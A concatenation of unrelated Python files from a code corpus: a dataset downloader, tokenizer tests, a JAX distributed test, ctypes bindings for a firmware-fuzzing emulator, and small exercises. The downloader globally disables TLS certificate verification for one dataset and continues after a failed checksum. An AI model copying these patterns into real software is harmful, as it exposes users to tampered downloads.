def download_dataset(name, cache_dir='~/.cache/bikit', rm_zip_or_rar=False, force_redownload=False):
"""
Download dataset if not on cache folder.
:param name: Dataset name
:param cache_dir: Cache directory
:return:
"""
if "test" in name:
datasets = DEMO_DATASETS
print(datasets[name])
elif "meta" in name:
print("Please download the needed datasets manually: [download_dataset(name) for name in ['bcd', 'codebrim-classif-balanced', 'mcds_Bikit', 'sdnet_binary']]")
return 0
else:
datasets = DATASETS
assert name in list(
datasets.keys()), f"Please specify a valid <name> out of {list(datasets.keys())}. You used {name}."
cache_dir = os.path.expanduser(cache_dir)
# Check if cache exist
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
print(f"Create cache {cache_dir}")
else:
print(f"{cache_dir} already exists")
# Set defaults
data_dict = datasets[name]
download_name = data_dict["download_name"]
if name in ["codebrim-classif-balanced"]:
cache_full_dir = os.path.join(cache_dir, download_name, "classification_dataset_balanced")
#elif name == "codebrim-classif-balanced":
# cache_full_dir = os.path.join(cache_dir, download_name, "classification_dataset")
else:
cache_full_dir = os.path.join(cache_dir, download_name)
# remove old Data for a clean new Download
if force_redownload:
if os.path.exists(cache_full_dir):
shutil.rmtree(cache_full_dir)
print(f"The Folder {cache_full_dir} has been removed.")
# cache_zip = os.path.join(cache_full_dir, data_dict['original_name'])
urls = data_dict['urls']
sizes = data_dict['sizes']
file_type = data_dict['original_names'][0].split(".")[-1]
checksums = data_dict['checksums']
names = data_dict['original_names']
#import pdb; pdb.set_trace()
# Download if not available
if not os.path.exists(cache_full_dir):
print(f"Create folder {cache_full_dir}")
os.makedirs(cache_full_dir)
# Download
# Some datasets consists of multiple files
for idx, (url, file_name, checksum, size) in enumerate(zip(urls, names, checksums, sizes)):
print(f"Start to download file {idx + 1} of {len(urls)} with {size}.")
cache_zip = os.path.join(cache_full_dir, file_name)
if name in ["codebrim-classif-balanced", "codebrim-classif", "sdnet_bikit", "sdnet_bikit_binary", "dacl1k"]:
gdrive_download(total_size=size, download_id=url, full_cache_dir=cache_zip)
else:
if name == "sdnet":
ssl._create_default_https_context = ssl._create_unverified_context
urllib.request.urlretrieve(url, filename=cache_zip, reporthook=_schedule)
sleep(1)
# Verify checksum
if checksum:
print("\nVerify checksum", end=" ")
calculated_checksum = _md5(cache_zip)
if calculated_checksum == checksum:
print("- checksum correct")
else:
print(calculated_checksum, checksum)
print("- checksum wrong!")
# Unzip/unrar
if file_type == "zip":
print("\nStart to unzip file", end=" ")
with zipfile.ZipFile(cache_zip, 'r') as zip_ref:
if name in ["sdnet_bikit", "sdnet_bikit_binary"]:
cache_full_dir = "/".join(cache_full_dir.split("/")[:-1])
zip_ref.extractall(cache_full_dir)
print("- unzip done!")
elif file_type == "rar":
print("Start to unraring file", end=" ")
try:
extract_archive(cache_zip, outdir=cache_full_dir)
except Exception as e:
print("\n", e)
print("\nHave you installed rar? Try <apt install unrar>.")
raise
print("- unrar done!")
# Rm zip/rar file
if rm_zip_or_rar:
print(f"Removing {cache_zip}.")
os.remove(cache_zip)
else:
print(f"{cache_dir} and {cache_full_dir} already exists.")
def _progressbar(cur, total=100):
"""Source: https://www.programmersought.com/article/14355722336/"""
percent = '{:.1%}'.format(cur / total)
sys.stdout.write('\r')
# sys.stdout.write("[%-50s] %s" % ('=' * int(math.floor(cur * 50 / total)),percent))
sys.stdout.write("Download data [%-100s] %s" % ('=' * int(cur), percent))
sys.stdout.flush()
def _schedule(blocknum, blocksize, totalsize):
"""
Source: https://www.programmersought.com/article/14355722336/
blocknum: currently downloaded block
blocksize: block size for each transfer
totalsize: total size of web page files
"""
if totalsize == 0:
percent = 0
else:
percent = blocknum * blocksize / totalsize
if percent > 1.0:
percent = 1.0
percent = percent * 100
# print("download : %.2f%%" %(percent))
_progressbar(percent)
def _md5(filename):
# Source: https://stackoverflow.com/a/3431838
hash_md5 = hashlib.md5()
with open(filename, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def gdrive_download(total_size, download_id, full_cache_dir=""):
"""
Download the codebrim_classif_dataset
:param total_size: file size of the zipfile from the json file
:param download_id: list of gdrive ids to download
:param full_cache_dir: Cache directory
"""
url = "https://docs.google.com/uc?export=download"
# download the Zip file
session = requests.Session()
response = session.get(url, params={'id': download_id}, stream=True)
token = _get_confirm_token(response)
if token:
params = {'id': download_id, 'confirm': token}
response = session.get(url, params=params, stream=True)
_save_response_content(response=response, destination=full_cache_dir, totalsize=total_size)
print(f"{full_cache_dir} is done")
else:
raise Exception("There was an Error while getting the download token!"
" This may occur when trying to download to often in a short time period."
" Please try again later!")
def _get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
def _save_response_content(response, destination, totalsize):
chunk_size = 32768
counter = 0
print_counter = 0
with open(destination, "wb") as f:
for chunk in response.iter_content(chunk_size):
if chunk:
f.write(chunk)
counter += 1
print_counter += 1
filesize = float(totalsize.split(" ")[0]) * 1073741824
_schedule(blocknum=counter, blocksize=chunk_size, totalsize=filesize)
sys.stdout.write(f"\n{round((chunk_size * counter) / 1073741824, 2)} GB Downloaded. Download finished.\n", )
if __name__ == "__main__":
name = "dacl1k"
download_dataset(name)
from bikit.datasets import BikitDataset # Deprecated: from bikit.datasets.data import BikitDataset
from torch.utils.data import DataLoader
from torchvision import transforms
my_transform = transforms.Compose([transforms.Resize((256, 256)), transforms.ToTensor()])
train_dataset = BikitDataset(name, split="train", transform=my_transform, return_type="pt")
train_loader = DataLoader(dataset=train_dataset, batch_size=64, shuffle=False, num_workers=0)
# Use it in your training loop
for i, (imgs, labels) in enumerate(train_dataset):
print(i, imgs.shape, labels.shape)
break
test_data, test_meta = False, False
if test_data:
name = "codebrim-classif"
#download_dataset(name, rm_zip_or_rar=True, force_redownload=False)
print("===Download done===")
from bikit.datasets import BikitDataset
from torch.utils.data import DataLoader
from torchvision import transforms
my_transform = transforms.Compose([transforms.Resize((256, 256)), transforms.ToTensor()])
trainval_dataset = BikitDataset(name, split="test", transform=my_transform)
trainval_loader = DataLoader(dataset=trainval_dataset, batch_size=64, shuffle=False, num_workers=0)
# Use it in your training loop
for i, (imgs, labels) in enumerate(trainval_loader):
print(i, imgs.shape, labels.shape, labels)
if i > 1:
break
print("===Done===")
elif test_meta:
download_metadata() | StarcoderdataPython |
3542623 | # coding: utf-8
from __future__ import unicode_literals
import pytest
@pytest.mark.parametrize('text',
["ق.م", "إلخ", "ص.ب", "ت."])
def test_ar_tokenizer_handles_abbr(ar_tokenizer, text):
tokens = ar_tokenizer(text)
assert len(tokens) == 1
def test_ar_tokenizer_handles_exc_in_text(ar_tokenizer):
text = u"تعود الكتابة الهيروغليفية إلى سنة 3200 ق.م"
tokens = ar_tokenizer(text)
assert len(tokens) == 7
assert tokens[6].text == "ق.م"
assert tokens[6].lemma_ == "قبل الميلاد"
def test_ar_tokenizer_handles_exc_in_text(ar_tokenizer):
text = u"يبلغ طول مضيق طارق 14كم "
tokens = ar_tokenizer(text)
print([(tokens[i].text, tokens[i].suffix_) for i in range(len(tokens))])
assert len(tokens) == 6
| StarcoderdataPython |
3207181 | import vel.util.intepolate as interpolate
from vel.api.base import Schedule
class LinearSchedule(Schedule):
""" Interpolate variable linearly between start value and final value """
def __init__(self, initial_value, final_value):
self.initial_value = initial_value
self.final_value = final_value
def value(self, progress_indicator):
""" Interpolate linearly between start and end """
return interpolate.interpolate_linear_single(self.initial_value, self.final_value, progress_indicator)
def create(initial_value, final_value):
""" Vel creation function """
return LinearSchedule(initial_value, final_value)
| StarcoderdataPython |
4837961 | import re
n = int(input())
regex = '[?+-]*\d?\.\d+'
for x in range(n):
num = input()
m = re.search(regex, num)
if m:
try:
f = float(num)
print(True)
except:
print(False)
else:
print(False)
| StarcoderdataPython |
358493 | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax.config import config
import jax._src.distributed as distributed
import jax._src.lib
from jax._src import test_util as jtu
try:
import portpicker
except ImportError:
portpicker = None
config.parse_flags_with_absl()
@unittest.skipIf(jax._src.lib.xla_extension_version < 73,
"Test requires jaxlib 0.3.12 or newer.")
@unittest.skipIf(not portpicker, "Test requires portpicker")
class DistributedTest(jtu.JaxTestCase):
def testInitializeAndShutdown(self):
# Tests the public APIs. Since they use global state, we cannot use
# concurrency to simulate multiple tasks.
port = portpicker.pick_unused_port()
jax.distributed.initialize(coordinator_address=f"localhost:{port}",
num_processes=1,
process_id=0)
jax.distributed.shutdown()
@parameterized.parameters([1, 2, 4])
def testConcurrentInitializeAndShutdown(self, n):
port = portpicker.pick_unused_port()
def task(i):
# We can't call the public APIs directly because they use global state.
state = distributed.State()
state.initialize(coordinator_address=f"localhost:{port}",
num_processes=n,
process_id=i)
state.shutdown()
threads = [threading.Thread(target=task, args=(i,)) for i in range(n)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
| StarcoderdataPython |
1942191 | """Handlers for oauth."""
from fastapi_aad_auth.oauth.aad import AADOAuthBackend # noqa F401
from fastapi_aad_auth.oauth.state import AuthenticationState # noqa F401 | StarcoderdataPython |
6427091 | import ctypes
import os
import sys
import logging
from . import timer
from .exit import has_exit_hooks, invoke_exit_callbacks
from .globs import (DEFAULT_BASIC_BLOCK_LIMIT,
DEFAULT_FUZZ_CONSUMPTION_TIMEOUT, DEFAULT_MAX_INTERRUPTS,
FUZZ_MODES, TRIGGER_MODES)
from .mmio_models.wrapper import mmio_access_handler_wrapper_hook
logger = logging.getLogger("emulator")
""" native.py
Wrapper around the native library API functions.
"""
native_lib = None
mmio_cb_wrapper = None
timer_cb_wrapper = None
timer_cb_user_data = None
# just like unicorn does we need to keep references to ctype cb objects
obj_refs = []
uc_engine = ctypes.c_void_p
# Prototyping code taken from unicorn python bindings
def _load_lib(path):
try:
lib_file = os.path.join(path)
dll = ctypes.cdll.LoadLibrary(lib_file)
return dll
except OSError as e:
logger.error(f'FAILED to load {lib_file} {e}')
return None
# setup all the function prototype
def _setup_prototype(lib, fname, restype, *argtypes):
getattr(lib, fname).restype = restype
getattr(lib, fname).argtypes = argtypes
EXIT_CB = ctypes.CFUNCTYPE(
None, ctypes.c_int, ctypes.c_int
)
UC_HOOK_CODE_CB = ctypes.CFUNCTYPE(
None, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p
)
UC_HOOK_MEM_ACCESS_CB = ctypes.CFUNCTYPE(
None, uc_engine, ctypes.c_int,
ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p
)
UC_HOOK_INTR_CB = ctypes.CFUNCTYPE(
None, uc_engine, ctypes.c_uint32, ctypes.c_void_p
)
mmio_user_data = None
def add_mmio_region(uc, start, end):
global mmio_user_data
if mmio_user_data is None:
mmio_user_data = ctypes.cast(uc._callback_count, ctypes.c_void_p)
assert native_lib.add_mmio_region(uc._uch, start, end, mmio_user_data)==0
def load_fuzz(file_path):
assert native_lib.load_fuzz(file_path.encode())==0
sys.stdout.flush()
def emulate(uc, fuzz_file_path, prefix_input_file_path=None):
# uc_err emulate(uc_engine *uc, char *input_path, uint64_t instr_limit, char *prefix_input_path);
if prefix_input_file_path:
prefix_input_file_path = prefix_input_file_path.encode()
else:
# In case input path is an empty string, set it to None explicitly
prefix_input_file_path = None
native_lib.emulate(uc._uch, fuzz_file_path.encode(), prefix_input_file_path)
def get_fuzz(uc, size):
ptr = (ctypes.c_char * size).from_address(native_lib.get_fuzz_ptr(uc, size))
return ptr.raw
def fuzz_consumed():
return native_lib.fuzz_consumed()
def fuzz_remaining():
return native_lib.fuzz_remaining()
def get_latest_mmio_fuzz_access_size():
return native_lib.get_latest_mmio_fuzz_access_size()
def get_latest_mmio_fuzz_access_index():
return native_lib.get_latest_mmio_fuzz_access_index()
def register_cond_py_handler_hook(uc, handler_locs):
if not handler_locs:
logger.warning("no function handler hooks registered, skipping registration")
return
arr = (ctypes.c_int64 * len(handler_locs))(*handler_locs)
# hack: In order to keep a uc reference around for the high level callback,
# we sneak an additional callback into the uc object (as done in unicorn.py)
from .user_hooks import func_hook_handler
callback = func_hook_handler
uc._callback_count += 1
uc._callbacks[uc._callback_count] = (callback, None)
cb = ctypes.cast(UC_HOOK_CODE_CB(uc._hookcode_cb), UC_HOOK_CODE_CB)
user_data = ctypes.cast(uc._callback_count, ctypes.c_void_p)
assert native_lib.register_cond_py_handler_hook(
uc._uch, cb, arr, len(arr), user_data
) == 0
obj_refs.append(cb)
def remove_function_handler_hook_address(uc, address):
assert native_lib.remove_function_handler_hook_address(uc._uch, address) == 0
def _create_and_inject_c_callable_mem_hook(uc, py_fn):
# hack: In order to keep a uc reference around for the high level callback,
# we sneak an additional callback into the uc object (as done in unicorn.py)
callback = py_fn
uc._callback_count += 1
uc._callbacks[uc._callback_count] = (callback, None)
cb = ctypes.cast(UC_HOOK_MEM_ACCESS_CB(uc._hook_mem_access_cb), UC_HOOK_MEM_ACCESS_CB)
user_data = ctypes.cast(uc._callback_count, ctypes.c_void_p)
obj_refs.append(cb)
return cb, user_data
def _create_and_inject_c_callable_central_timer_hook(uc, py_fn):
callback = py_fn
# hack: In order to keep a uc reference around for the high level callback,
# we sneak an additional callback into the uc object (as done in unicorn.py)
# even bigger hack: we re-use the prototype of interrupt callbacks for the fact of their function prototype
# to create an alternative callback
# from: cb(self, intno, data)
# to : cb(self, timer_id, data)
uc._callback_count += 1
uc._callbacks[uc._callback_count] = (callback, None)
cb = ctypes.cast(UC_HOOK_INTR_CB(uc._hook_intr_cb), UC_HOOK_INTR_CB)
user_data = ctypes.cast(uc._callback_count, ctypes.c_void_p)
obj_refs.append(cb)
return cb, user_data
def register_py_handled_mmio_ranges(uc, python_handled_range_starts, python_handled_range_ends):
global mmio_cb_wrapper
assert mmio_cb_wrapper is not None
assert len(python_handled_range_starts) == len(python_handled_range_ends)
starts_arr = (ctypes.c_int64 * len(python_handled_range_starts))(*python_handled_range_starts)
ends_arr = (ctypes.c_int64 * len(python_handled_range_ends))(*python_handled_range_ends)
assert native_lib.register_py_handled_mmio_ranges(uc._uch, mmio_cb_wrapper, starts_arr, ends_arr, len(python_handled_range_ends)) == 0
def register_linear_mmio_models(uc, starts, ends, pcs, init_vals, steps):
assert len(starts) == len(ends) == len(init_vals) == len(steps)
starts_arr = (ctypes.c_int64 * len(starts))(*starts)
ends_arr = (ctypes.c_int64 * len(ends))(*ends)
init_vals_arr = (ctypes.c_int32 * len(init_vals))(*init_vals)
steps_arr = (ctypes.c_int32 * len(steps))(*steps)
pcs_arr = (ctypes.c_int32 * len(pcs))(*pcs)
assert native_lib.register_linear_mmio_models(uc._uch, starts_arr, ends_arr, pcs_arr, init_vals_arr, steps_arr, len(starts)) == 0
def register_constant_mmio_models(uc, starts, ends, pcs, vals):
assert len(starts) == len(ends) == len(vals)==len(pcs)
starts_arr = (ctypes.c_int64 * len(starts))(*starts)
ends_arr = (ctypes.c_int64 * len(ends))(*ends)
vals_arr = (ctypes.c_int32 * len(vals))(*vals)
pcs_arr = (ctypes.c_int32 * len(pcs))(*pcs)
assert native_lib.register_constant_mmio_models(uc._uch, starts_arr, ends_arr, pcs_arr, vals_arr, len(starts)) == 0
def register_bitextract_mmio_models(uc, starts, ends, pcs, byte_sizes, left_shifts, masks):
assert len(starts) == len(ends) == len(byte_sizes) == len(left_shifts) == len(pcs)
starts_arr = (ctypes.c_int64 * len(starts))(*starts)
ends_arr = (ctypes.c_int64 * len(ends))(*ends)
byte_sizes_arr = (ctypes.c_int8 * len(byte_sizes))(*byte_sizes)
left_shifts_arr = (ctypes.c_int8 * len(left_shifts))(*left_shifts)
masks_arr = (ctypes.c_int32 * len(masks))(*masks)
pcs_arr = (ctypes.c_int32 * len(pcs))(*pcs)
assert native_lib.register_bitextract_mmio_models(uc._uch, starts_arr, ends_arr, pcs_arr, byte_sizes_arr, left_shifts_arr, masks_arr, len(starts)) == 0
def register_value_set_mmio_models(uc, starts, ends, pcs, value_sets):
assert len(starts) == len(ends) == len(value_sets) == len(value_sets) == len(pcs)
starts_arr = (ctypes.c_int64 * len(starts))(*starts)
ends_arr = (ctypes.c_int64 * len(ends))(*ends)
pcs_arr = (ctypes.c_int32 * len(pcs))(*pcs)
value_nums_arr = (ctypes.c_int32 * len(value_sets))(*[len(value_set) for value_set in value_sets])
value_set_arrs = [(ctypes.c_int32 * len(value_set))(*value_set) for value_set in value_sets]
value_sets_arr_ptrs = (ctypes.POINTER(ctypes.c_ulong) * len(value_set_arrs))(*[ctypes.cast(value_set_arr, ctypes.POINTER(ctypes.c_ulong)) for value_set_arr in value_set_arrs])
assert native_lib.register_value_set_mmio_models(uc._uch, starts_arr, ends_arr, pcs_arr, value_nums_arr, value_sets_arr_ptrs, len(starts)) == 0
def set_ignored_mmio_addresses(addresses, pcs):
addrs_arr = (ctypes.c_int64 * len(addresses))(*addresses)
pcs_arr = (ctypes.c_uint32 * len(pcs))(*pcs)
assert native_lib.set_ignored_mmio_addresses(
addrs_arr, pcs_arr, len(addrs_arr)
) == 0
def init_nvic(uc, vtor, num_vecs, interrupt_limit=DEFAULT_MAX_INTERRUPTS, disabled_interrupts=()):
global native_lib
logger.debug("Calling init_nvic with vtor=0x{:08x}, num_vecs: {}".format(vtor, num_vecs))
disabled_interrupts_arr = (ctypes.c_int32 * len(disabled_interrupts))(*disabled_interrupts)
assert native_lib.init_nvic(uc._uch, vtor, num_vecs, interrupt_limit, len(disabled_interrupts), disabled_interrupts_arr) == 0
def init_native_tracing(uc, bbl_set_trace_path, bbl_hash_path, mmio_set_trace_path, mmio_ranges):
global native_lib
mmio_region_starts, mmio_region_ends = zip(*mmio_ranges)
mmio_region_starts_arr = (ctypes.c_uint64 * len(mmio_region_starts))(*mmio_region_starts)
mmio_region_ends_arr = (ctypes.c_uint64 * len(mmio_region_ends))(*mmio_region_ends)
if not bbl_set_trace_path:
bbl_set_trace_path = None
else:
bbl_set_trace_path = bbl_set_trace_path.encode()
if not mmio_set_trace_path:
mmio_set_trace_path = None
else:
mmio_set_trace_path = mmio_set_trace_path.encode()
if not bbl_hash_path:
bbl_hash_path = None
else:
bbl_hash_path = bbl_hash_path.encode()
assert(native_lib.init_tracing(uc._uch, bbl_set_trace_path, bbl_hash_path, mmio_set_trace_path, len(mmio_ranges), mmio_region_starts_arr, mmio_region_ends_arr) == 0)
def nvic_set_pending(vec_num):
global native_lib
native_lib.nvic_set_pending(vec_num)
def init_timer_hook(uc, global_timer_scale):
global native_lib
global timer_cb_user_data
global timer_cb_wrapper
cb, user_data = _create_and_inject_c_callable_central_timer_hook(uc, timer.central_timer_hook)
timer_cb_wrapper = cb
timer_cb_user_data = user_data
assert native_lib.init_timer_hook(uc._uch, global_timer_scale) == 0
def init_systick(uc, reload_val):
global native_lib
assert native_lib.init_systick(uc._uch, reload_val) == 0
IRQ_NOT_USED=0xffffffff
def add_timer(reload_val, callback=None, isr_num=IRQ_NOT_USED):
global timer_cb_wrapper
global timer_cb_user_data
global native_lib
assert timer_cb_wrapper is not None and timer_cb_user_data is not None
# While technically allowed in the C code, invoking a callback and pending an interrupt at the same time is nothing we would like to support
assert not (callback is not None and isr_num != IRQ_NOT_USED)
passed_cb = timer_cb_wrapper if callback is not None else 0
return native_lib.add_timer(reload_val, passed_cb, timer_cb_user_data, isr_num)
def is_running(timer_id):
return native_lib.is_running(timer_id)
def get_global_ticker():
global native_lib
return native_lib.get_global_ticker()
def rem_timer(uc, timer_id):
global native_lib
assert native_lib.rem_timer(uc, timer_id) == 0
def reload_timer(timer_id):
global native_lib
assert native_lib.reload_timer(timer_id) == 0
def start_timer(uc, timer_id):
global native_lib
assert native_lib.start_timer(uc, timer_id) == 0
def stop_timer(uc, timer_id):
global native_lib
assert native_lib.stop_timer(uc, timer_id) == 0
# uc_hook add_interrupt_trigger(uc_engine *uc, uint64_t addr, uint32_t irq, uint32_t num_skips, uint32_t num_pends, uint32_t do_fuzz);
def add_interrupt_trigger(uc, addr, irq, num_skips, num_pends, fuzz_mode, trigger_mode, every_nth_tick):
assert fuzz_mode < len(FUZZ_MODES) and trigger_mode < len(TRIGGER_MODES)
assert native_lib.add_interrupt_trigger(uc._uch, addr, irq, num_skips, num_pends, fuzz_mode, trigger_mode, every_nth_tick) == 0
def register_native_debug_hooks(uc):
assert(native_lib.add_debug_hooks(uc._uch) == 0)
def load_native_lib(native_lib_path):
global native_lib
native_lib = _load_lib(native_lib_path)
assert native_lib is not None
def do_exit(uc, status, sig=-1):
global native_lib
native_lib.do_exit(uc, status, sig)
def init(uc, mmio_regions, exit_at_bbls, exit_at_hit_num, do_print_exit_info, fuzz_consumption_timeout=DEFAULT_FUZZ_CONSUMPTION_TIMEOUT, instr_limit=DEFAULT_BASIC_BLOCK_LIMIT):
global native_lib
global mmio_cb_wrapper
# GENERAL
# uc_err init( uc_engine *uc, exit_hook_t p_exit_hook, int p_num_mmio_regions, uint64_t *p_mmio_starts, uint64_t *p_mmio_ends, void *p_py_default_mmio_user_data, uint32_t num_exit_at_bbls, uint64_t *exit_at_bbls, uint32_t exit_at_hit_num, int p_do_print_exit_info, uint64_t fuzz_consumption_timeout, uint64_t p_instr_limit);
_setup_prototype(native_lib, "init", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_uint, ctypes.c_void_p, ctypes.c_uint, ctypes.c_uint, ctypes.c_uint64, ctypes.c_uint64)
# uc_err register_cond_py_handler_hook(uc_cb_hookcode_t py_callback, uint64_t *addrs, int num_addrs)
_setup_prototype(native_lib, "register_cond_py_handler_hook", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
# uc_err remove_function_handler_hook_address(uc_engine * uc, uint64_t address);
_setup_prototype(native_lib, "remove_function_handler_hook_address", ctypes.c_int, uc_engine, ctypes.c_uint64)
# void do_exit(uc_engine *uc, int status, int sig);
_setup_prototype(native_lib, "do_exit", ctypes.c_int, uc_engine, ctypes.c_int, ctypes.c_int)
# FUZZING
_setup_prototype(native_lib, "load_fuzz", ctypes.c_int, ctypes.c_char_p)
# uint32_t fuzz_remaining();
_setup_prototype(native_lib, "fuzz_remaining", ctypes.c_int)
# uint64_t num_consumed_fuzz();
_setup_prototype(native_lib, "fuzz_consumed", ctypes.c_uint32)
# uint32_t get_latest_mmio_fuzz_access_size();
_setup_prototype(native_lib, "get_latest_mmio_fuzz_access_size", ctypes.c_uint32)
# uint32_t get_latest_mmio_fuzz_access_index();
_setup_prototype(native_lib, "get_latest_mmio_fuzz_access_index", ctypes.c_uint32)
# char *get_fuzz_ptr(uc_engine *uc, uint32_t size);
_setup_prototype(native_lib, "get_fuzz_ptr", ctypes.c_void_p, uc_engine, ctypes.c_uint32)
# uc_err add_mmio_region(uc_engine *uc, uint64_t begin, uint64_t end)
_setup_prototype(native_lib, "add_mmio_region", ctypes.c_int, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p)
# extern uc_err register_py_handled_mmio_ranges(uc_engine *uc, uc_cb_hookmem_t py_callback, uint64_t *starts, uint64_t *ends, int num_ranges);
_setup_prototype(native_lib, "register_py_handled_mmio_ranges", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
# extern uc_err set_ignored_mmio_addresses(uint64_t *addresses, uint32_t *pcs, int num_addresses);
_setup_prototype(native_lib, "set_ignored_mmio_addresses", ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
# extern uc_err register_linear_mmio_models(uc_engine *uc, uint64_t *starts, uint64_t *ends, uint32_t *pcs, uint32_t *init_vals, uint32_t *steps, int num_ranges);
_setup_prototype(native_lib, "register_linear_mmio_models", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
# extern uc_err register_constant_mmio_models(uc_engine *uc, uint64_t *starts, uint64_t *ends, uint32_t *pcs, uint32_t *vals, int num_ranges)
_setup_prototype(native_lib, "register_constant_mmio_models", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
# extern uc_err register_bitextract_mmio_models(uc_engine *uc, uint64_t *starts, uint64_t *ends, uint32_t *pcs, uint8_t *byte_sizes, uint8_t *left_shifts, uint32_t * masks, int num_ranges);
_setup_prototype(native_lib, "register_bitextract_mmio_models", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
# extern uc_err register_value_set_mmio_models(uc_engine *uc, uint64_t *starts, uint64_t *ends, uint32_t *pcs, uint32_t *value_nums, uint32_t **value_lists, int num_ranges);
_setup_prototype(native_lib, "register_value_set_mmio_models", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
# NVIC
# extern uc_err init_nvic(uc_engine *uc, uint32_t vtor, uint32_t num_irq, uint32_t interrupt_limit, uint32_t num_disabled_interrupts, uint32_t *disabled_interrupts);
_setup_prototype(native_lib, "init_nvic", ctypes.c_int, uc_engine, ctypes.c_uint, ctypes.c_uint, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p)
# extern void nvic_set_pending(int num)
_setup_prototype(native_lib, "nvic_set_pending", ctypes.c_int, ctypes.c_int)
# TRACING
# uc_err init_tracing(uc_engine *uc, char *bbl_set_trace_path, char *mmio_set_trace_path, size_t num_mmio_ranges, uint64_t *mmio_starts, uint64_t *mmio_ends);
_setup_prototype(native_lib, "init_tracing", ctypes.c_int, uc_engine, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p)
# DEBUG
# uc_err add_debug_hooks(uc_engine *uc)
_setup_prototype(native_lib, "add_debug_hooks", ctypes.c_int, uc_engine)
# TIMER
# extern uint64_t get_global_ticker();
_setup_prototype(native_lib, 'get_global_ticker', ctypes.c_int64)
# extern uc_err init_timer_hook(uc_engine *uc, uint32_t global_timer_scale);
_setup_prototype(native_lib, "init_timer_hook", ctypes.c_int, uc_engine, ctypes.c_uint)
# extern uint32_t add_timer(int64_t reload_val, void *trigger_callback, uint32_t isr_num);
_setup_prototype(native_lib, "add_timer", ctypes.c_int, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_uint32)
# extern uc_err rem_timer(uc_engine *uc, uint32_t id);
_setup_prototype(native_lib, "rem_timer", ctypes.c_int, uc_engine, ctypes.c_uint32)
# extern uc_err reload_timer(uint32_t id);
_setup_prototype(native_lib, "reload_timer", ctypes.c_int, uc_engine, ctypes.c_uint32)
# extern uc_err start_timer(uc_engine *uc, uint32_t id);
_setup_prototype(native_lib, "start_timer", ctypes.c_int, uc_engine, ctypes.c_uint32)
# extern uc_err stop_timer(uc_engine *uc, uint32_t id);
_setup_prototype(native_lib, "stop_timer", ctypes.c_int, uc_engine, ctypes.c_uint32)
# SYSTICK
# extern uc_err init_systick(uc_engine *uc, uint32_t reload_val);
_setup_prototype(native_lib, "init_systick", ctypes.c_int, uc_engine, ctypes.c_uint32)
# INTERRUPT TRIGGERS
# uc_hook add_interrupt_trigger(uc_engine *uc, uint64_t addr, uint32_t irq, uint32_t num_skips, uint32_t num_pends, uint32_t fuzz_mode, uint32_t trigger_mode, uint64_t every_nth_tick);
_setup_prototype(native_lib, "add_interrupt_trigger", ctypes.c_int, uc_engine, ctypes.c_uint64, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint64)
# Starting emulation
# uc_err emulate(uc_engine *uc, char *input_path, char *prefix_input_path);
_setup_prototype(native_lib, "emulate", ctypes.c_int, uc_engine, ctypes.c_char_p, ctypes.c_char_p)
mmio_region_starts, mmio_region_ends = zip(*mmio_regions)
mmio_region_starts_arr = (ctypes.c_int64 * len(mmio_region_starts))(*mmio_region_starts)
mmio_region_ends_arr = (ctypes.c_int64 * len(mmio_region_ends))(*mmio_region_ends)
mmio_cb_wrapper, user_data = _create_and_inject_c_callable_mem_hook(uc, mmio_access_handler_wrapper_hook)
if has_exit_hooks():
exit_cb = ctypes.cast(EXIT_CB(invoke_exit_callbacks), EXIT_CB)
obj_refs.append(exit_cb)
else:
exit_cb = 0
num_exit_at_bbls = len(exit_at_bbls)
exit_at_bbls_arr = (ctypes.c_int64 * len(exit_at_bbls))(*exit_at_bbls)
assert native_lib.init(uc._uch, exit_cb, len(mmio_regions), mmio_region_starts_arr, mmio_region_ends_arr, user_data, num_exit_at_bbls, exit_at_bbls_arr, exit_at_hit_num, do_print_exit_info, fuzz_consumption_timeout, instr_limit) == 0
| StarcoderdataPython |
3229256 | """ Advent of code 2017 day 15/1 """
from argparse import ArgumentParser
class Generator(object):
""" Value generators """
def __init__(self, factor, initial, name):
""" Constructor for the object """
self.factor = factor
self.prev_value = initial
self.name = name
def __next__(self):
""" To make it iterable """
return_value = (self.prev_value * self.factor) % 2147483647
#print(self.name, self.prev_value, return_value)
self.prev_value = return_value
return return_value
def __iter__(self):
return self
class Judge(object):
